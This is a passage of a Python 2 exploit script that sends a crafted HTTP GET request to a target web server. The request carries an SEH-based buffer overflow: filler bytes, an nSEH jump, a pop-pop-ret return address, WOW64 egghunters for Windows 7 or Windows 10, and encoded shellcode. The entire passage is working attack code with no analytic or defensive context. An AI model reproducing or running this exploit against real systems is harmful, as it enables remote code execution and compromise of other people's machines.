"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")
crash = "\x41" * 2487
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
filler = "\x44" * (2505-334-300-100)
nseh = "\xeb\x08\x90\x90"
stack_fill="\x41"*100
nops="\x90"*8
egg = "t00wt00w"
if os == "win7":
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x33\xd2"
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xef\xb8"
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
elif os == "win10":
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
else:
print "[!] This windows version is not supported yet"
exit(0)
exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler
buffer = "GET /"+exploit+" HTTP/1.1\r\n"
buffer+= "Host: "+host+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://"+host+"/login\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()